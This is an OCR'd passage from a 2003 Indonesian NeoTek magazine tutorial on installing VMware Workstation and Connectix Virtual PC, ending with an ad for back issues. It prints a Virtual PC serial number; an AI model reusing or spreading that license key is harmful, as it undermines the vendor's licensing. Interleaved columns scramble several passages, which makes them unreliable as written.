500MB, itu sudah termasuk aplikasi pada komputer anda dan mengizin-
seperti Microsoft Office. kan sistem operasi guest untuk
mengakses file-file yang ada di host
6. Mengaktifkan CD-ROM drive komputer melalui virtual network
Pilih CD-ROM Enabled. Kemudian internal.
ketika device CDROM, misalnya,
9. Memeriksa dan menyelesaikan
/dev/cdrom. konfigurasi:

Ini adalah langkah terakhir dalam
konfigurasi. Periksa sekali lagi
pilihan-pilihan yang sudah Aanda
tentukan. Jika sudah benar klik
tombol Done.
VMware merekomendasikan untuk
menggunakan Configuration Wizard
untuk membuat konfigurasi komputer
virtual anda. Namun, anda juga dapat
menggunakan Editor untuk pengguna-
an lebih lanjut.
Instalasi Sistem Operasi Guest
Menginstal sebuah sistem operasi
guest di dalam komputer virtual pada
dasarnya sama saja dengan saat anda
menginstal sistem operasi pada sebuah
komputer secara fisik.
Untuk menginstal sistem operasi pada
komputer virtual, ikuti langkah-langkah
berikut:
1. Masukkan CD-ROM instalasi atau
floppy disk untuk sistem operasi
guest.
2. Aktifkan komputer virtual dengan
mengklik tombol Power On.
3. Ikuti langkah-langkah instalasi
seperti biasa Anda menginstalasi
sistem operasi lainnya.
Sistem operasi yang dapat Anda
instalasikan pada VMware
Workstation seperti:
• Windows NT 4.0
• Windows 95
• Windows 98
• Windows 2000
• DOS / Windows 3.1
• Caldera OpenLinux
• Corel Linux OS
• Red Hat Linux
• SuSE Linux
• FreeBSD
• Novell NetWare (masih dalam
percobaan)
Instalasi VMware Tools untuk
Sistem Operasi Guest
Menginstal aplikasi VMware Tools
akan sangat berguna bagi sistem ope-
rasi guest. Walaupun VMware Work-
station akan dapat menjalankan sebuah
sistem operasi guest tanpa tool-tool
VMware, namun dalam lingkungan
grafik, paling tinggin hanya menangani
resolusi rendah (640x480, 16 color).
Dengan VMware Tools, SVGA driver
akan langsung diinstalasikan. VMware
Workstation mendukung tampilan
sampai 32-bit dan tampilan dengan
resolusi tinggi,
File-file VMware Tools untuk Linux
dan VMware Tools untuk Windows
dapat dimasukkan ke dalam VMware
Workstation (Settings à VMware Tools
Install). VMware Tools untuk Win-
dows mendukung sistem operasi guest
seperti Windows 95/98, NT 4.0, dan
Windows 2000.
Instalasi VMware Tools for Windows
1. Aktikan komputer virtual.
2. Konfigurasi ulang komputer vir-
tual anda menggunakan VMWare
Tools floppy image. Pilih Settings
→ VMware Tools Install
3. Klik ganda ikon My Computer di
Desktop anda
4. Klik ganda ikon drive A:
5. Klik ganda VMwareTools.exe dan
ikuti instruksi yang ditampilkan.
Instruksi untuk melakukan konfi-
gurasi driver kartu VGA akan di-
tampilkan secara otomatis di Note-
pad pada saat akhir proses instalasi.
Jika window Notepad tersembunyi,
klik tombol Notepad dari taskbar
Windows.
6. Setelah anda mengklik tombol Finish,
akan ditampilkan window Display
Settings.
7. Klik tombol Advanced. Akan mun-
cul dialog Standard Display Adapter
(VGA) Properties. Jika Anda meng-
upgrade dari versi, dialog yang
muncul adalah VMware SVGA
Properties.
8. Klik Adapter.
9. Klik tombol Change. Muncul dialog
Update Device Driver Wizard. Klik
Next.
10. Dialog Wizard menampilkan dua
opsi. Pilih opsi Display a list of all
drivers in a specific location... se-
lanjutnya klik tombol Next.
11. Klik tombol Have Disk. Muncul
dialog Install From Disk.
12. Selanjutnya pindah ke direktori ins-
talasi VGA untuk Win9x, klik OK:
A:\WIN9x
13. Pilih display adapter VMware
SVGA(FIFO) dan klik OK.
NeoTutor
14. Jawab Yes pada pertanyaan di layar
Aanda, kemudian klik Next untuk
menginstal driver. Sesudah insta-
lasi driver berhasil, klik Finish.
15. Klik Close untuk keluar dari dialog
SVGA Properties, kemudian klik
lagi Close untuk keluar dari dialog
Display Setting.
16. VMware Tools akan langsung
dijalankan pada saat Anda booting
ulang komputer virtual.
17. Sesudah me-restart komputer vir-
tual Windows 98, buka device
manager dan yakinkan display
adapter yang anda gunakan adalah
VMware SVGA(FIFO).
Instalasi VMware Tools for Linux
1. Jalankan komputer virtual anda.
Berikut ini langkah-langkah yang
harus Anda lakukan pada komputer
virtual, bukan di host komputer.
2. Pastikan komputer virtual anda siap
untuk diinstal VMware Tools.
Pilih Settings → VMware Tools
Install
Jika anda tidak memutuskan untuk
tidak jadi menginstal VMware
Tools, anda dapat membatalkannya.
Pilih Settings → Cancel VMware
Tools Install.
3. Jika melanjutkan dan anda belum
sebagai root, pada terminal ketikkan:
su
4. Lakukan mounting ke drive
/dev/fd0 (merupakan virtual floppy
disk yang berisi file VMware Tools),
copy-kan file tersebut ke direktori
/tmp, lalu unmount floppy.
cd /
mount -t vfat /dev/fd0 /mnt
cp /mnt/vmware-linux-tools.tar.gz
/tmp
umount /dev/fd0
5. Ekstrak file tar VMware Tools ke
direktori /tmp kemudian instal.
cd /tmp
tar zxf vmware-linux-tools.tar.gz
cd vmware-linux-tools
./install.pl
Februari 2003 NeoTek 43
 NeoTutor
6. Jalankan X bila anda berada di
terminal text.
7. Jalankan VMware Tools background
application.
vmware-toolbox &
Anda mungkin akan menjalankan
VMware Tools background application
sebagai root atau sebuah user biasa.
Aplikasi tersebut akan menambahkan
beberapa kemampuan lain pada saat
anda menjalankannya sebagai root.
Mengkonfigurasi VMware Tools
Uraian berikut ini mengemukakan peng-
gunaan sistem operasi guest Windows
98. Konfigurasi serupa dapat diterap-
kan pada sistem operasi guest lain.
1. Klik kanan ikon VMware Tools dari
system tray, kemudian klik Options
.... (atau double-klik ikon VMware
Tools dari system tray.)
2. Opsi VMware Toolbox antara lain:
• Release input focus when the
mouse leaves the virtual machine
• Capture input focus when the
mouse enters the virtual machine
• Scroll when mouse nears edge of
the virtual machine
• Hide Cursor when the virtual
machine loses input focus
• Bring the virtual machine to the
top when it gets input focus
Sedangkan opsi Miscellaneous adalah:
• Allow copy and paste to and from
the virtual machine [between the
44 NeoTek Februari 2003
host and the virtual machine(s)
and among virtual machines]
• Time synchronization between
the virtual machine and the host
operating system [new feature in
this release]
3. Pada Devices tab dapat anda tentu-
kan device mana yang akan diaktif-
kan (enable) atau tidak (disable).
5. Klik di mana saja pada jendela VM-
ware Workstation untuk melakukan
kontrol dari mouse dan keyboard.
6. Jika anda ingin login ke suatu net-
work, ketikkan nama dan password
seperti ketika anda login ke komputer.
4. Shrink tab dapat digunakan untuk Menjalankan Komputer Virtual
menentukan kembali space pada
drive anda.
Menjalankan VMware Workstation
Sekarang anda sudah menginstal VM-
ware Workstation, sebuah sistem ope-
rasi guest, dan VMware Tools. Bagai-
mana menjalankan komputer virtual
anda?
Sekadar gambaran, tuntunan berikut
diasumsikan bahwa Linux digunakan
sebagai host sistem operasi dan Win-
dows 98 merupakan sistem operasi
guest-nya. Beberapa perintah yang di-
gunakan dalam ilustrasi ini mungkin Catatan: Ketika VMware Tool
akan berbeda pada sistem operasi lain. Windows sedang dalam keadaan aktif,
Untuk menghidupkan atau mematikan akan terlihat ikonnya pada system tray
komputer virtual, anda hanya perlu anda (seperti gambar di atas)
menekan tombol Power On dan Power Menggunakan Mode Full Screen
Off saja.
Jika anda ingin VMware Workstation
• Komputer virtual menampilkan komputer virtual Anda
dalam keadaan dalam format layar penuh (full screen)
off (atas) dan on
(bawah).
—tentu saja border VMware Workstat-
ion tidak akan terlihat lagi—klik tom-
bol Full Screen dari tool bar.
Untuk keluar dari mode full screen—
menampilkan komputer virtual ada di
layar VMware Workstation—tekan
Memulai Komputer Virtual tombol kombinasi Ctrl+Alt+Esc secara
bersamaan.
1. Buka sebuah terminal, ketikkan
vmware dan tekan Enter. Instalasi Software Aplikasi pada
2. Pilih radio button Open an existing Komputer Virtual
configuration, kemudian klik OK. Instalasi software aplikasi pada kom-
3. Browse ke komputer virtual direk- puter virtual dapat anda lakukan layak-
tori. Sorot file win98.cfg, klik OK. nya menginstal software tersebut pada
komputer biasa.
4. Klik tombol Power On untuk mulai
menjalankan komputer virtual 1. Yakinkan anda sudah menjalankan
anda. komputer virtual dan jika perlu,

anda login. Pada Device tab pastikan
pula komputer virtual Anda dapat
mengakses CD-ROM dan floppy
disk.
2. Masukkan CD atau floppy Instalasi
ke drive yang bersangkutan. Jika
anda menginstal melalui CD-ROM
program mungkin akan dijalankan
secara otomatis.
3. Jika program instalasi tidak secara
otomatis dijalankan, di Windows,
klik tombol Start → Settings →
Control Panel, klik ganda Add/
Remove Programs dan klik tombol
Install. Ikuti langkah-langkah yang
diberikan software tersebut selama
proses instalasi.
Cutting dan pasting
SaatVMware
Tools sedang
dalam ke-
adaan jalan, anda dapat melakukan
copy dan paste di antara aplikasi-apli-
kasi, baik pada komputer virtual mau-
pun host komputer, bahkan antara dua
atau lebih komputer virtual.
Menggunakan mode disk
VMware Workstation dapat menggu-
nakan tiga perbedaan mode disk, yaitu
persistent, nonpersistent, dan undoable.
Persistent disks berlaku persis seperti
disk drive biasa pada sebuah komputer.
Penulisan ke sebuah persistent disk
ditulis secara permanen ke dalam disk.
Penulisan menggunakan mode non-
persistent akan menghilangkan data
yang dituliskan pada saat anda mema-
tikan komputer virtual. Pada mode
undoable, aAnda mempunyai opsi
apakah anda akan membiarkan data
anda atau tidak selama anda bekerja.
Sebelum anda putuskan memilih salah
satunya, data akan tersimpan pada
pada sebuah file redo-log.
Anda dapat menggunakan konfigurasi
editor untuk mengubah mode disk
untuk komputer virtual anda.
1. Ikuti Langkah 1 dan 2 pada Starting
a Virtual Machine, tetapi jangan
klik tombol Power On sebelumnya.
2. Pilih Configuration Editor dari
menu Settings.
+) di bagian IDE
3. Klik tanda plus (+
Drives untuk melihat subdirektori
di bawahnya, kemudian klik drive
primary (P-M = Primary Master)
untuk memilih drive tersebut.
4. Pilih opsi yang sesuai untuk mode
disk Persistent, Nonpersistent, atau
Undoable, klik Save untuk melaku-
kan perubahan dan tutup Configur-
ation Editor.
Menggunakan Suspend dan
Instant Restore
Suspend pada komputer virtual:
1. Jika komputer virtual anda sedang
aktif dalam mode full-screen, kem-
balikan ke window mode dengan
menekan tombol kombinasi
Ctrl+Alt+Esc secara bersamaan.
2. Klik tab Suspend pada tombol
VMware Workstation.
3. Untuk keluar dari VMware
Workstation.
Pilih menu File → Exit
Mengembalikan komputer virtual dari
status suspended:
1. Memulai VMware Workstation dan
pilih komputer virtual yang sedang
dalam posisi suspended. Proses di
atas gambarannya sama ketika
Anda memulai komputer virtual
seperti sebelumnya
2. Klik Resume pada bar tombol
VMware Workstation.
NeoTutor
Shut Down Komputer Virtual
1. Pilih Shut Down dari menu Start
sistem operasi guest (Windows 98).
2. Pilih tombol radio Shut Down, klik
OK.
3. Untuk keluar dari aplikasi VMware
Workstation, sebaiknya sistem
operasi guest yang aktif Anda shut
down terlebih dahulu.
Jika anda menggunakan sistem operasi
guest yang berbeda, prosedurnya
menjalankannya sama saja.
Ketinggalan Membaca
NeoTek?
Edisi lama: harga khusus &
bebas ongkos kirim
Baru tahu ada majalah NeoTek?
Penawaran khusus edisi lama NeoTek
Rp15.000,-/eks (dengan CD)
Rp8000,-/eks (tanpa CD)
Rp10.000,-/eks (CD saja)
Hubungi: Elvy Risma Nainggolan
(redaksi@neotek.co.id)
Telp. 021-5481457
Ada apa saja di edisi lama NeoTek?
II/1 Oktober 2001
Hacking dengan Back Orifice
II/2 November 2001
Dasar-dasar Remote Hacking
II/3 Desember 2001
Footprinting: Intelijen Awal
II/4 Januari 2002
Software Cracking
II/5 Februari 2002
Meng-hack NT Server
II/6 Maret 2002
SoftICE: Serial Fishing
II/7 April 2002
Mengintip Password dengan Dsniff
II/8 Mei 2002
Superscan: Scanning Tool setara Nmap
II/9 Juni 2002
Skrip mIRC & EggDrop
II/10 Juli 2002
Legion: Jalan-jalan ke Komputer Orang
II/11 Agustus 2002
Hacking & PC Securit; Virus & Trojan
II/12 September 2002
Password Cracking: Seni & Tekniknya
Februari 2003 NeoTek 45
 NeoTutor

CONNECTIX VIRTUAL PC
onnectix Virtual PC for Windows
C dapat diinstal pada berbagai versi
Windows. Pada contoh ini, Virtual
PC akan diinstal pada Windows ME.

INSTALASI MESIN MAYA Selanjutnya guest OS yang akan diinstal

adalah Windows XP Professional Edition.
Dengan Connectix Virtual PC, anda dapat

PADA WINDOWS ME bereksperimen dengan berbagai macam

sistem operasi serta berbagai macam distro
Linux, langsung pada Windows ME anda,
tanpa harus takut partisi komputer anda
Connectix Virtual PC pada awalnya tersedia untuk Mac menjadi berantakan.
agar dapat menjalankan Windows. Namun kini Virtual PC Selain itu, bila memasang sistem operasi
tersedia pada platform Windows, Mac, dan OS/2 untuk guest yang sama dengan sistem operasi host,
anda pada dasarnya menciptakan suatu
menjalankan mesin maya dari pelbagai platform, termasuk virtual sandbox, suatu lingkungan terpisah
Linux, Solaris, dan BSD. untuk menginstal berbagai program yang

Menyiapkan hard disk image untuk guest OS pada host OS.

MEMULAI INSTALASI PILIHAN BAHASA INSTALL SHIELD WIZARD

1 Jalankan Virtual PC yang ada pada
CD NeoTek bulan ini dengan klik
2 Ada banyak bahasa yang dapat di-
pilih dalam melakukan setup. Kita
3 Kita akan menjalankan InstallShiled
Wizard yang akan sangat memu-
dua kali ikonnya. File-file secara pilih saja salah satunya. Dalam hal dahkan kita melakukan setup. Klik
default akan disimpan di sub- ini English (United States) dan Next yang akan menampilkan End
direktori Connectix dibawah direk- klik OK untuk memulai setup. User Licence Agreement. Pilih
tori C:\ProgramFiles (dapat diubah). I accept... dan klik Next.
Selanjutnya akan muncul jendela
untuk mulai men-setup Virtual PC

ADA DI MENU BAR PC SETUP WIZARD PC NAME

7 Setelah restart, Connectix Virtual
PC kini telah terdapat pada menu
8 Akan tampil jendela kecil Virtual
bar. Pilih menu itu yang akan me-
nampilkan jendela kecil yang
memberi opsi apakah akan mem-
beli (Buy Now) dengan indikasi
berapa lama lagi akan expire. Klik
OK untuk melanjutkan.
PC dengan tombol pertama New
9 Selanjutnya anda diminta mem-
beri nama pada virtual PC yang
PC. Karena belum pernah ada akan anda instal. Pada contoh ini
guest OS yang diinstal, maka diberi nama Virtual Windows XP.
secara otomatis New PC ini yang Tapi anda dapat saja memberi
dipilih dan akan menampilkan nama lain, seperti mungkin nama
jendela PC Setup Wizard. Klik pemakainya. Klik Next untuk
Next untuk melanjutkan. melanjutkan.

46 NeoTek Februari 2003

 NeoTutor

mungkin berbahaya seperti Trojan horse,

bereksperimen dengan berbagai macam
virus dan worm generator, exploit,
serta hasil download dari Internet yang
tidak jelas faktor risikonya.
Berbeda dengan VMWare yang meng-
gunakan beberapa driver bawaannya
sendiri dan terkadang tidak menggu-
nakan driver asli dari hardware-nya,
maka Connectix Virtual PC membaca
nyaris segala macam driver yang ter-
sedia sehingga virtual machine yang
terbentuk sangat mirip dengan mesin
riil, yang seolah-olah guest OS dipa-
• Layar pembuka
sang langsung pada hardware yang
instalasi Connectix
bersangkutan.
Virtual PC 5.1 for
Windows.

SERIAL NUMBER BAHASA DAN OPSI SETUP INSTALASI SAMPAI SELESAI

4 Anda akan diminta memasukkan
User Name dan Organization. Isi
5 Virtual PC dapat di-setup agar
saja sesuai keinginan anda. Untuk
hasil download yang ada di CD
NeoTek ini, serial numbernya adalah
VPT5-6127-4803-8483-3427
menggunakan pelbagai bahasa.
6 Program akan diinstal pada di-
rektori yang sama yaitu sub-
Pilih saja English dan pada setup direktori Connectix di bawah
type ada pilihan Complete atau direktori C:\ProgramFiles (dapat
Custom. Untuk pertama kali ini, diubah). Selesai instalasi, anda
kita pilih Complete. perlu me-restart komputer anda.

KONFIGURASI VIRTUAL PC ALOKASI RAM & HD IMAGE GUEST OS TERINSTAL

10 Virtual PC default dapat diben-
tuk untuk kemudian diedit se-
11
cara manual, namun untuk mu-
dahnya pilih opsi Guide Me dan
klik Next. Akan tampil guest OS
apa yang akan diinstal. Dalam
hal ini pilih Windows XP.
Akan tampil informasi mengenai
RAM yang dialokasikan untuk vir-
12
tual PC ini dan dapat anda ubah
dengan menggeser slide bar. Pada
contoh dari alokasi RAM 64 Mbyte
kita ubah ke 128 Mbyte (host-nya
256 Mbyte). Selanjutnya pilih
membuat hard disk image baru.
Lokasi dan nama hard disk image
adalah C:\MyDocuments\Virtual
Windows XP.vhd (dapat diubah).
Ikuti saja sampai selesai. Akan
tampil Setup Summary dan kini
pada jendela kecil Virtual PC
sudah terdapat guest OS yang
belum dijalankan.

Februari 2003 NeoTek 47

 NeoTutor

CONNECTIX VIRTUAL PC
ard disk image yang dibentuk
H merupakan hard disk kosong yang
padanya dapat diinstalkan sistem
operasi yang diinginkan. Untuk itu mesin

INSTALASI GUEST OS maya harus di-boot dengan installer CD

(atau installer diskette) terpasang.
Selanjutnya instalasi akan berjalan seperti

PADA MESIN MAYA layaknya menginstal sistem operasi yang

bersangkutan pada mesin sungguhan.
Driver-driver yang penting seperti untuk
setting resolusi layar dan sound card dike-
Mesin maya yang dibentuk pada dasarnya menyiapkan nali dengan baik oleh Virtual PC.
image untuk guest OS. Untuk menginstal guest OS itu Apabila mesin maya ini berada dalam
sendiri kita harus menjalankan mesin maya itu dengan CD suatu network, maka mesin ini akan dike-
nali sebagai mesin sendiri dan mendapat-
Installer (atau diskette installer) yang terpasang, yang akan kan IP Address sendiri pula.
mem-boot mesin maya tersebut dengan guest OS.

Instalasi sistem operasi tamu di bawah sistem operasi tuan rumah.

MENGHIDUPKAN MESIN MAYA BOOT WINDOWS XP CD PARTISI YANG TERSEDIA

1 Dengan Windows XP Installer CD
terpasang pada CD drive, double
2 Tekan sembarang tombol keyboard
click pada jendela yang menggam-
barkan virtual hardware yang akan
membuat virtual hardware itu di-
boot seperti layaknya hardware
sungguhan yang akan memeriksa
RAM sebelum boot dari CD.
untuk mem-boot mesin maya ini
3 Mengikuti setelan yang telah kita la-
kukan sebelumnya terhadap mesin
dari CD. Anda akan mendapatkan maya, akan ditunjukkan bahwa
jendela Windows XP Professional mesin maya ini mempunyai hard
Setup. Tekan Enter dan anda akan disk image sebesar 16,3 Mbyte
masuk ke End User Licence Agree- dengan format partisi FAT32. Kita
ment-nya Microsoft. Tekan F8 bisa mengubah partisi ini menjadi
untuk menyetujuinya. NTFS bila diinginkan.

PRODUCT KEY SAMPAI ADMIN SETUP NETWORK SETUP NETWORK CARD

7 Selanjutnya masukkan product
key Windows XP yang akan dilan-
8 Dalam proses instalasi ini,
jutkan dengan mengisi Computer
Name dan administrator pass-
word.
Windows XP Installer akan men-
9 Windows XP Installer akan me-
ngenali network card yang ada
setup network anda juga. Ada dan menginstal protokol-protokol
dua pilihan: Typical settings dan yang diperlukan. Pada contoh ini
Custom settings. pilih Custom LAN-nya berupa peer-to-peer
settings dan klik Next untuk networking dengan workgroup
melanjutkan. NEOTEK yang artinya tidak
menggunakan domain name.

48 NeoTek Februari 2003


Berbeda dengan VMWare yang me-
netapkan virtual network adapter,
mesin maya di bawah Virtual PC
akan menggunakan network adapter
yang sama dengan tuan rumahnya
(shared network adapter dan bukan
bridged network adapter).
Secara keseluruhan instalasi mesin
maya pada Virtual PC sama mudahnya
(kalau tidak lebih mudah) dibanding-
kan VMWare.
Hanya saja, walaupun dapat meng-
instal guest OS Linux, Solaris, serta
BSD, Virtual PC tidak tersedia pada
platform Linux. Hanya tersedia pada
Windows, Mac, dan OS/2.
INSTALASI SAMPAI BOOT
4 File-file yang diperlukan akan di-
copy ke hard disk image tadi
sebelum akhirnya komputer akan
di-boot ulang. Kali ini akan di-
boot dari hard disk maya yang
sudah diisi file-file Windows XP.
RESOLUSI LAYAR
10 Setelah instalasi selesai, akan
tampil pesan bahwa Windows
akan mengubah resolusi layar
agar dihasilkan penampilan
terbaik. Klik OK dan akan tampil
pesan yang menanyakan apakah
suatu teks dapat terbaca. Bila
ya, klik OK untuk melanjutkan.
NeoTutor
• Pada Virtual PC
dengan nama Virtual
Windows XP ini
belum terpasang OS
apapun. Yang
terbentuk hanyalah
mesin maya (setara
hardware) yang dapat
dilihat spesifikasinya
dengan menekan
tombol “Settings...”
INSTALASI WINDOWS XP CUSTOMIZE SETTING
5 Setelah tampil menu pembuka
Windows XP yang khas itu, instal-
6 Pada jendela Setting, anda bisa
menekan tombol Customize
asi Windows XP akan diteruskan untuk mengubah setelah format
dengan tampilan grafis. tanggal, digit, mata uang, serta
lokasi geografis.
RESTART DAN USER LOG IN VIRTUAL XP PADA LAN
11 Instalasi selesai dan Windows XP
akan restart dengan penampilan
12 Kini anda dapat menjalankan vir-
tual XP ini seperti layaknya kom-
khasnya. Pilih user untuk log in puter sungguhan. Di sini tampak
dan Windows XP akan menerap- browse ke situs NeoTek dan tam-
kan personal setting pada sesi pilan network neighborhood, baik
Windows XP virtual ini. pada virtual XP maupun pada real
ME. Tampak ada lima komputer
yang satu di antaranya virtual.